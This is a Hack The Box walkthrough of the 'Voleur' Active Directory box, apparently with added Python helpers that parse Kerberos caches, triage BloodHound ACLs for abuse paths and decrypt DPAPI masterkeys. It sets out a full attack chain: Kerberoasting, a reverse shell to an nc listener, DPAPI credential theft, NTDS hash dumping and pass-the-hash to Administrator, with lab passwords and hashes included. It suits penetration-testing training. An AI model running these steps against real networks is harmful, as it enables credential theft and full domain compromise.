Voleur HTB Writeup and Walkthrough

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by Ivo Ponso
© All Rights Reserved

Voleur

IP

[Link]

Domain/Hosts

[Link] [Link]

/etc/krb5.conf

[libdefaults]
default_realm = [Link]
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true

[realms]
[Link] = {
kdc = [Link]
admin_server = [Link]
default_domain = [Link]
}

[domain_realm]
.[Link] = [Link]
[Link] = [Link]

Info

As is common in real-life Windows pentests, you start the Voleur box with credentials for the
following account: [Link] / HollowOct31Nyt

Nmap Results

SMB Enumeration
We generate a Kerberos TGT for user Ryan Naylor using netexec with password authentication

netexec smb [Link] -u [Link] -p 'HollowOct31Nyt' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use Ryan Naylor’s TGT

export KRB5CCNAME=[Link]

We verify the current Kerberos ticket

klist

We list available SMB shares on [Link] using netexec with Kerberos authentication

netexec smb [Link] -u [Link] -p 'HollowOct31Nyt' -k --shares

We got some interesting shares
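The file that KRB5CCNAME points at is a plain binary credential cache, so the checks klist performs can be scripted and run before every `-k` command. The block below is an added example, not code from the original writeup or from netexec/impacket: it parses an MIT ccache in the usual format version 4 (what impacket-based tools such as netexec --generate-tgt write), lists the principal and tickets, and flags the three things that most often break Kerberos authentication in a box like this: a default principal whose realm does not match the one you are targeting (case matters), no TGT for that realm, and an expired ticket. The realm EXAMPLE.LOCAL, the principal names and the ticket bytes are constructed for the example; pass a real ccache path as the first argument to inspect it instead.

```python
"""Minimal klist for MIT Kerberos credential caches (format v4, as impacket and
netexec --generate-tgt write them). Added example; realm, principals and ticket
bytes below are constructed, not taken from any target."""
import struct
import sys
import time

REALM = "EXAMPLE.LOCAL"   # assumed realm for the example


def _data(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _principal(name_type: int, realm: str, components: list) -> bytes:
    out = struct.pack(">II", name_type, len(components)) + _data(realm.encode())
    for c in components:
        out += _data(c.encode())
    return out


def build_ccache(client: str, realm: str, start: int, end: int, renew_till: int) -> bytes:
    """Build a v4 ccache holding one TGT for client@realm (ticket bytes are a dummy)."""
    buf = struct.pack(">H", 0x0504)
    # v4 header: total length, then one DeltaTime tag (tag 1, 8 bytes: two uint32s)
    buf += struct.pack(">HHHII", 12, 1, 8, 0, 0)
    buf += _principal(1, realm, [client])                 # default principal, NT-PRINCIPAL
    buf += _principal(1, realm, [client])                 # credential: client
    buf += _principal(2, realm, ["krbtgt", realm])        # credential: server, NT-SRV-INST
    buf += struct.pack(">HI", 18, 32) + b"\x11" * 32      # keyblock: aes256-cts-hmac-sha1-96
    buf += struct.pack(">IIII", start, start, end, renew_till)   # authtime, starttime, endtime, renew_till
    buf += b"\x00"                                        # is_skey
    buf += struct.pack(">I", 0x40E10000)                  # forwardable, renewable, initial, pre-authent
    buf += struct.pack(">II", 0, 0)                       # no addresses, no authdata
    buf += _data(b"\x61\x04dummy")                        # ticket (opaque ASN.1 in real caches)
    buf += _data(b"")                                     # second_ticket
    return buf


class _Reader:
    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def take(self, n: int) -> bytes:
        chunk = self.buf[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())

    def principal(self) -> str:
        _name_type, n = self.u32(), self.u32()
        realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(n)) + "@" + realm


def parse_ccache(buf: bytes) -> dict:
    r = _Reader(buf)
    version = r.u16()
    if version != 0x0504:
        raise ValueError(f"unsupported ccache version {version:#06x} (only v4 handled)")
    r.take(r.u16())                          # skip the v4 header tags
    default_principal = r.principal()
    creds = []
    while r.pos < len(buf):
        client, server = r.principal(), r.principal()
        etype = r.u16()
        r.take(r.u32())                      # session key bytes
        authtime, starttime, endtime, renew_till = [r.u32() for _ in range(4)]
        r.u8()                               # is_skey
        flags = r.u32()
        for _ in range(r.u32()):             # addresses: type + data
            r.u16(); r.data()
        for _ in range(r.u32()):             # authdata: type + data
            r.u16(); r.data()
        r.data(); r.data()                   # ticket, second_ticket
        creds.append({"client": client, "server": server, "etype": etype,
                      "starttime": starttime, "endtime": endtime,
                      "renew_till": renew_till, "flags": flags})
    return {"default_principal": default_principal, "credentials": creds}


def check_tgt(cache: dict, realm: str, now: int) -> list:
    """Problems worth knowing before a -k command: realm mismatch, no TGT, expired TGT."""
    problems = []
    if not cache["default_principal"].endswith("@" + realm):
        problems.append("default principal realm != " + realm)
    tgts = [c for c in cache["credentials"] if c["server"] == f"krbtgt/{realm}@{realm}"]
    if not tgts:
        problems.append("no TGT for realm " + realm)
    elif tgts[0]["endtime"] <= now:
        problems.append("TGT expired")
    return problems


if __name__ == "__main__":
    now = int(time.time())
    raw = (open(sys.argv[1], "rb").read() if len(sys.argv) > 1
           else build_ccache("ryan.naylor", REALM, now, now + 36000, now + 604800))
    cache = parse_ccache(raw)
    print("Default principal:", cache["default_principal"])
    for c in cache["credentials"]:
        print(f"  {c['server']}  etype={c['etype']}  expires={time.ctime(c['endtime'])}")
    print("Problems:", check_tgt(cache, REALM, now) or "none")
```

The realm check is deliberately case-sensitive: a ticket issued for a lowercase realm will not be accepted when the tools expect the uppercase one, which is the usual cause of a "KDC_ERR_WRONG_REALM" or "Server not found in Kerberos database" after a successful TGT request.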

We connect to [Link] using [Link] with Kerberos ticket authentication

KRB5CCNAME=[Link] [Link] -k [Link]

use IT
cd First-Line Support
get Access_Review.xlsx

Creds in Access_Review.xlsx

Warning

The Access_Review.xlsx file is protected with a password

We extract the password hash from Access_Review.xlsx using office2john and save it to [Link]

office2john Access_Review.xlsx >> [Link]

We crack the extracted password hash

john --wordlist=/usr/share/wordlists/[Link] [Link]

football1 (Access_Review.xlsx) ✅

We create a Python virtual environment and install msoffcrypto-tool

python3 -m venv venv
source venv/bin/activate
pip install msoffcrypto-tool

cd /mnt/NASDF017E/#Kali/HTB/Voleur_HTB

python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx

I opened the sheet in [Link] (because I had no tool installed for viewing xlsx files) 😁

🔐 Service account passwords in Access_Review.xlsx

User      Password
svc_ldap  M1XyC9pW7qT5Vn
svc_iis   N5pXyV1WqM7CZ8

Important

We obtain a hint that the deleted user [Link] had the password NightT1meP1dg3on14

Attack Chain
We run bloodhound-python with Ryan Naylor's credentials to collect all Active Directory data from
the [Link] domain, using Kerberos and writing the output as a zip archive

bloodhound-python -u [Link] -p 'HollowOct31Nyt' -c All -d [Link] -ns [Link] --zip -k

➡️ svc_ldap has GenericWrite on [Link] and WriteSPN on svc_winrm
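The edge that drives the rest of the chain (svc_ldap holding WriteSPN over svc_winrm and GenericWrite over another user) can be found without importing the zip into Neo4j: every object in the collector's JSON carries an `Aces` array with `PrincipalSID` and `RightName`. The following is an added example, not code from the original writeup or from BloodHound, that walks those arrays, keeps only rights that are actually abusable, drops the expected noise from Domain Admins, SYSTEM and similar principals, and maps each right to the usual next step. The collection fragment inside it is constructed (domain EXAMPLE.LOCAL, the SID prefix, and the JDOE target are invented); `load_collection()` reads a real `--zip` archive.

```python
"""Triage outbound control rights from bloodhound-python JSON without Neo4j.
Added example: the collection fragment below is constructed (domain EXAMPLE.LOCAL,
SID prefix and the JDOE target are invented); load_collection() reads a real --zip."""
import json
import sys
import zipfile

ABUSABLE = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns", "WriteSPN",
            "ForceChangePassword", "AllExtendedRights", "AddMember", "AddSelf",
            "AddKeyCredentialLink", "WriteAccountRestrictions"}

NEXT_STEP = {
    "WriteSPN": "targeted Kerberoast: set an SPN, request the TGS, remove the SPN",
    "GenericWrite": "targeted Kerberoast or shadow credentials (user); logon script (computer)",
    "GenericAll": "reset password, add to group, or shadow credentials",
    "ForceChangePassword": "reset the password",
    "AddMember": "add a controlled principal to the group",
    "AddSelf": "add yourself to the group",
    "WriteDacl": "grant yourself GenericAll, then continue",
    "WriteOwner": "take ownership, then WriteDacl",
    "Owns": "rewrite the DACL as owner",
    "AllExtendedRights": "ForceChangePassword on users; DCSync on the domain head",
    "AddKeyCredentialLink": "shadow credentials (PKINIT)",
    "WriteAccountRestrictions": "RBCD via msDS-AllowedToActOnBehalfOfOtherIdentity",
}

# Principals whose control edges are expected and only hide the interesting ones.
NOISE_RID = {"512", "516", "518", "519"}                    # Domain Admins, DCs, Schema/Enterprise Admins
NOISE_SID = {"S-1-5-18", "S-1-5-32-544", "S-1-5-32-548"}    # SYSTEM, Administrators, Account Operators


def _is_noise(sid: str) -> bool:
    return sid in NOISE_SID or sid.rsplit("-", 1)[-1] in NOISE_RID


def load_collection(zip_path: str) -> list:
    """All objects from every *.json inside a bloodhound-python --zip output."""
    objects = []
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            if name.endswith(".json"):
                objects.extend(json.loads(zf.read(name))["data"])
    return objects


def find_abusable_aces(objects: list, skip_noise: bool = True) -> list:
    """(who, right, over what, next step) for every abusable ACE, sorted."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objects}
    edges = []
    for obj in objects:
        for ace in obj.get("Aces", []):
            right, src = ace["RightName"], ace["PrincipalSID"]
            if right not in ABUSABLE or (skip_noise and _is_noise(src)):
                continue
            edges.append((names.get(src, src), right, obj["Properties"]["name"], NEXT_STEP[right]))
    return sorted(edges)


# Constructed collection fragment (shape of users.json / groups.json "data" entries).
DOM = "S-1-5-21-1-2-3"


def _ace(sid, right, inherited=False, ptype="User"):
    return {"PrincipalSID": sid, "PrincipalType": ptype, "RightName": right, "IsInherited": inherited}


SAMPLE = [
    {"ObjectIdentifier": f"{DOM}-512", "Properties": {"name": "DOMAIN ADMINS@EXAMPLE.LOCAL"}, "Aces": []},
    {"ObjectIdentifier": f"{DOM}-1104", "Properties": {"name": "SVC_LDAP@EXAMPLE.LOCAL"},
     "Aces": [_ace(f"{DOM}-512", "GenericAll", True, "Group")]},
    {"ObjectIdentifier": f"{DOM}-1105", "Properties": {"name": "SVC_WINRM@EXAMPLE.LOCAL"},
     "Aces": [_ace(f"{DOM}-512", "GenericAll", True, "Group"), _ace(f"{DOM}-1104", "WriteSPN")]},
    {"ObjectIdentifier": f"{DOM}-1106", "Properties": {"name": "JDOE@EXAMPLE.LOCAL"},
     "Aces": [_ace(f"{DOM}-512", "GenericAll", True, "Group"), _ace(f"{DOM}-1104", "GenericWrite")]},
]

if __name__ == "__main__":
    objs = load_collection(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for who, right, target, step in find_abusable_aces(objs):
        print(f"{who} --{right}--> {target}\n    next: {step}")
```

Run it against the zip from the command above to get the same two edges the GUI shows; drop `skip_noise` to see everything, including the inherited Domain Admins rights that otherwise swamp the list.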

We generate a Kerberos TGT for svc_ldap on [Link] using netexec with password
authentication

netexec smb [Link] -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k --generate-tgt svc_ldap

We set the Kerberos ticket cache environment variable to use svc_ldap’s TGT

export KRB5CCNAME=svc_ldap.ccache

We perform a targeted Kerberoast attack using the svc_ldap account with Kerberos authentication
against [Link]

[Link] -k --dc-host [Link] -u svc_ldap -d [Link]

We crack Kerberos password hashes using John the Ripper with the RockYou wordlist

john --wordlist=/usr/share/wordlists/[Link] hashes_kerberos.txt

Only the hash for svc_winrm cracks

We generate a Kerberos TGT for svc_winrm on [Link] using netexec with password
authentication

netexec smb [Link] -u svc_winrm -p 'AFireInsidedeOzarctica980219afi' -k --generate-tgt svc_winrm

We set the Kerberos ticket cache environment variable to use svc_winrm’s TGT

export KRB5CCNAME=svc_winrm.ccache

We connect to [Link] using evil-winrm with Kerberos authentication as svc_winrm

evil-winrm -i [Link] -k -u svc_winrm -r [Link]

User Flag 🏁
We got the User Flag

type C:\Users\svc_winrm\Desktop\[Link]

Restore user [Link]

svc_ldap is in the RESTORE_USERS group, so it should be able to restore the user [Link]

We create a tools directory on the target and upload [Link] to it

mkdir C:\tools
cd C:\tools

upload [Link]

Start a listener

nc -lvnp 4444

.\[Link] svc_ldap M1XyC9pW7qT5Vn [Link] -r [Link]

We got a shell as svc_ldap

Switch to PowerShell

powershell

We query Active Directory for all deleted user objects, retrieving their ObjectGUIDs, SIDs and last
known parent OUs

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

We restore the deleted Active Directory object with the specified ObjectGUID

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

We confirm that [Link] is back

net user /domain

IT Share second-line
We generate a Kerberos TGT for [Link] on [Link] using netexec with password
authentication

netexec smb [Link] -u [Link] -p 'NightT1meP1dg3on14' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use [Link]’s TGT

export KRB5CCNAME=[Link]

We connect to [Link] using [Link] with Kerberos ticket authentication for [Link]

KRB5CCNAME=[Link] [Link] -k [Link]

We download the credential and DPAPI masterkey files from Todd Wolfe's archived user profile via
SMB

mget /Second-Line Support/Archived Users/[Link]/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
mget /Second-Line Support/Archived Users/[Link]/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88

We decrypt Todd Wolfe's DPAPI masterkey file using [Link] with his SID and password

[Link] masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14

We decrypt Todd Wolfe's DPAPI credential file using [Link] with the extracted masterkey

[Link] credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Username : [Link]
Unknown : qT3V9pLXyN7W4m
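What dpapi.py does above with `-sid` and `-password` is fully deterministic and can be reproduced offline, which is useful when you want to understand why a decrypt fails (wrong SID, wrong password, or a masterkey that is not password-protected at all): the password is hashed as UTF-16LE, HMAC-SHA1 with the SID turns that into a pre-key, PBKDF2 with the salt, iteration count and algorithm IDs stored in the masterkey file yields the block-cipher key and IV, and the decrypted section is HMAC-checked before the 64-byte masterkey is trusted. That 64-byte value is the `-key 0x...` passed to the credential step. The block below is an added example, not the original's code nor impacket's: it parses the masterkey file layout and derives the key material with the standard library only; the final block-cipher step assumes pycryptodome is installed. The SID, password and file contents used in its test are constructed.

```python
"""Offline DPAPI masterkey handling, mirroring what dpapi.py masterkey -sid -password does.
Added example (not impacket's code). Standard library only, except the final block-cipher
step which assumes pycryptodome is installed. Test inputs are constructed."""
import hashlib
import hmac
import struct
import sys

CALG_SHA_512, CALG_AES_256 = 0x800E, 0x6610      # modern (Win7+) user masterkey settings
CALG_HMAC, CALG_3DES = 0x8009, 0x6603            # legacy SHA1/3DES files


def user_prekey(sid: str, password: str) -> bytes:
    """Domain-user pre-key: HMAC-SHA1(key=SHA1(UTF-16LE password), msg=UTF-16LE(sid + NUL))."""
    pwd_hash = hashlib.sha1(password.encode("utf-16le")).digest()
    return hmac.new(pwd_hash, (sid + "\0").encode("utf-16le"), hashlib.sha1).digest()


def parse_masterkey_file(blob: bytes) -> dict:
    """128-byte header: version, 2 reserved, 72-byte UTF-16LE GUID, 2 reserved, policy,
    then uint64 lengths of the MasterKey, BackupKey, CredHist and DomainKey sections."""
    (version, _, _, guid, _, _, policy,
     mk_len, bk_len, ch_len, dk_len) = struct.unpack("<III72sIIIQQQQ", blob[:128])
    if version != 2:
        raise ValueError(f"unexpected masterkey file version {version}")
    mk = blob[128:128 + mk_len]
    mk_version, salt, rounds, hash_algo, crypt_algo = struct.unpack("<I16sIII", mk[:32])
    return {"guid": guid.decode("utf-16le").rstrip("\0"), "policy": policy,
            "lengths": (mk_len, bk_len, ch_len, dk_len),
            "masterkey": {"version": mk_version, "salt": salt, "rounds": rounds,
                          "hash_algo": hash_algo, "crypt_algo": crypt_algo, "data": mk[32:]}}


def derive_cipher_key(prekey: bytes, mk: dict) -> tuple:
    """PBKDF2-HMAC over the pre-key with the file's own salt and iteration count; the output
    is split into block-cipher key and IV (32+16 for AES-256, 24+8 for 3DES)."""
    hash_name = "sha512" if mk["hash_algo"] == CALG_SHA_512 else "sha1"
    key_len, iv_len = (32, 16) if mk["crypt_algo"] == CALG_AES_256 else (24, 8)
    derived = hashlib.pbkdf2_hmac(hash_name, prekey, mk["salt"], mk["rounds"], key_len + iv_len)
    return derived[:key_len], derived[key_len:]


def decrypt_masterkey(prekey: bytes, mk: dict) -> bytes:
    """CBC-decrypt the section, then verify the embedded HMAC before trusting the 64-byte key.
    Assumption: pycryptodome provides the cipher (not part of the standard library)."""
    from Crypto.Cipher import AES, DES3
    key, iv = derive_cipher_key(prekey, mk)
    mod = AES if mk["crypt_algo"] == CALG_AES_256 else DES3
    clear = mod.new(key, mod.MODE_CBC, iv).decrypt(mk["data"])
    h = hashlib.sha512 if mk["hash_algo"] == CALG_SHA_512 else hashlib.sha1
    hmac_salt, stored = clear[:16], clear[16:16 + h().digest_size]
    secret = clear[-64:]                                   # the key dpapi.py prints as 0x...
    hmac_key = hmac.new(prekey, hmac_salt, h).digest()
    if not hmac.compare_digest(hmac.new(hmac_key, secret, h).digest(), stored):
        raise ValueError("HMAC mismatch: wrong SID/password (or not a password-protected key)")
    return secret


def build_masterkey_file(guid: str, salt: bytes, rounds: int, data: bytes) -> bytes:
    """Constructed test file with only a MasterKey section, SHA-512/AES-256 flavour."""
    mk = struct.pack("<I16sIII", 2, salt, rounds, CALG_SHA_512, CALG_AES_256) + data
    hdr = struct.pack("<III72sIIIQQQQ", 2, 0, 0, guid.encode("utf-16le").ljust(72, b"\0"),
                      0, 0, 0, len(mk), 0, 0, 0)
    return hdr + mk


if __name__ == "__main__":          # usage: <masterkey file> <SID> <password>
    path, sid, password = sys.argv[1:4]
    info = parse_masterkey_file(open(path, "rb").read())
    mk = info["masterkey"]
    print(f"GUID {info['guid']}  rounds={mk['rounds']}  hash={mk['hash_algo']:#x}  cipher={mk['crypt_algo']:#x}")
    print("Decrypted key: 0x" + decrypt_masterkey(user_prekey(sid, password), mk).hex())
```

The HMAC check is the part that tells a wrong password apart from a corrupt file: the cipher will always produce 64 bytes, but only the right SID/password pair makes the embedded HMAC verify. The SID must be the one in the Protect folder name (here ...-1110), not the SID of whoever is running the tool.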

IT Share Third-Line
We generate a Kerberos TGT for [Link] on [Link] using netexec with password
authentication

netexec smb [Link] -u [Link] -p 'qT3V9pLXyN7W4m' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use [Link]'s TGT

export KRB5CCNAME=[Link]

We connect to [Link] using [Link] with Kerberos ticket authentication for [Link]

KRB5CCNAME=[Link] [Link] -k [Link]

We download the id_rsa private SSH key and the [Link] file from the "Third-Line Support" SMB
share directory

mget /Third-Line Support/id_rsa
mget /Third-Line Support/[Link]

SSH Shell as svc_backup


[Link]

The Admin is frustrated with Windows Backup and has partially configured WSL (Windows
Subsystem for Linux) to explore using Linux-based backup tools instead. They asked Jeremy to set
it up further.

Since this is about backup jobs, we test SSH access with the svc_backup account.

We set strict permissions on the id_rsa SSH private key file using chmod 600

chmod 600 id_rsa

We connect via SSH to [Link] as svc_backup on port 2222 using the downloaded id_rsa
private key

ssh svc_backup@[Link] -p 2222 -i id_rsa

We list the contents of the Active Directory and registry backup folders within the Third-Line Support
Backups directory
(While connected as [Link] , the folder was not visible due to permission restrictions)

ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'


ls '/mnt/c/IT/Third-Line Support/Backups/registry'

We copy all files from the Active Directory and registry backup directories on [Link]
to the local machine using scp with the id_rsa key on port 2222

scp -P 2222 -i id_rsa svc_backup@[Link]:/mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/* ./ && \
scp -P 2222 -i id_rsa svc_backup@[Link]:/mnt/c/IT/Third-Line\ Support/Backups/registry/* ./

NTDS Attack
We extract Active Directory user hashes from the local SYSTEM and [Link] files using
[Link]

[Link] -system SYSTEM -ntds [Link] LOCAL

We request a Kerberos TGT for the administrator account in [Link] using the NTLM hash with
[Link]

[Link] -hashes :e656e07c56d831611bxxxxxb259ad2 -dc-ip [Link] [Link]/administrator

We set the Kerberos ticket cache environment variable to use the administrator’s TGT

export KRB5CCNAME=[Link]

We connect to [Link] using evil-winrm with Kerberos authentication as administrator

evil-winrm -i [Link] -k -u administrator -r [Link]

Root Flag 🏁
We got the Root Flag 🏁💪

type C:\Users\Administrator\Desktop\[Link]

By 2ubZ3r0

